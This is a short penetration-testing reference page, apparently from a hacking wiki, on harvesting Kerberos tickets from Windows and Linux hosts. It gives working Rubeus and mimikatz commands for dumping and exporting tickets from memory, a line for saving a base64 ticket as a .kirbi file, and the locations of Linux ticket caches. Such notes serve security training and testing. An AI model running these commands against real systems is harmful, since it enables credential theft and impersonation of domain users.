# 88 - Kerberos

## Harvest tickets from Windows

Rubeus `triage` will list the Kerberos tickets in all the logon sessions currently on a system. If you're not in a elevated state it can only show tickets in your own logon session.

```bash
C:\Tools\Rubeus\Rubeus\bin\Debug> Rubeus.exe triage
 ------------------------------------------------------------------------------------------------------------------ 
 | LUID     | UserName                    | Service                                       | EndTime               |
 ------------------------------------------------------------------------------------------------------------------ 
 | 0x79474  | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:13:03 PM |
 | 0x3e4    | srv-1$ @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:11:00 PM |
 | 0x1f8cd  | jking @ DEV.CYBERBOTIC.IO   | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:10:56 PM |
```

```
# Using mimikatz
sekurlsa::tickets /export
# Dump all tickets with Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
```

### Harvest tickets from Linux

On Linux, **tickets are stored in credential caches or ccaches**. There are 3 main types, which indicate where **tickets can be found:**

* **Files**, by default under **/tmp** directory, in the form of **krb5cc\_%{uid}.**
* **Kernel Keyrings**, an special space in the Linux kernel provided for storing keys.
* **Process memory,** used when only one process needs to use the tickets.